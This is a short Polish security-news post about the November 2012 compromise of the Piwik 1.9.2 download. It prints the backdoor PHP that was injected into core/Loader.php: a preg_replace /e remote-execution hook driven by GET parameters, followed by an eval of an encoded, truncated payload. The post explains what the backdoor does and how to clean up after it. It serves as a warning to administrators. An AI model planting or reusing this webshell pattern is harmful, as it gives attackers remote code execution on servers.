Backdoor w Piwiku

dodał 27 listopada 2012 o 19:25 w kategorii Drobiazgi  z tagami:

Piwik, darmowe oprogramowanie do analizy ruchu www, zostało wczoraj na kilka godzin wzbogacone o dodatkowy, nieautoryzowany fragment kodu. Co  ciekawe, do włamania doszło poprzez niesprecyzowaną wtyczkę WordPressa, używanego na serwerze Piwika. Włamywacz zmodyfikował plik ZIP wersji 1.9.2. Jeśli wczoraj po południu lub w nocy instalowaliście lub aktualizowaliście Piwika, lepiej sprawdźcie, czy nie dostaliście 'bonusu”. Na końcu pliku piwik/core/Loader.php włamywacz dodał kod

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$

Backdoor dodany przez włamywacza przesyła na wskazany adres link do serwera, na którym zainstalowano zainfekowaną wersję oraz umozliwia zdalne wykonanie kodu na tym serwerze. Jeśli znajdziecie taki fragment, najlepiej zrobić backup konfiguracji i usunąć cały folder Piwika i wgrać nową, świeżą kopię, a następnie przejrzeć logi httpd pod kątem podejrzanych wpisów.

Co ciekawe, incydent pokazuje, jak czujni są użytkownicy – administratorzy Piwika otrzymali 5 raportów o wykrytym zagrożeniu w ciągu 2 godzin. To budujące, że tylu użytkowników czyta kod instalowanych aplikacji.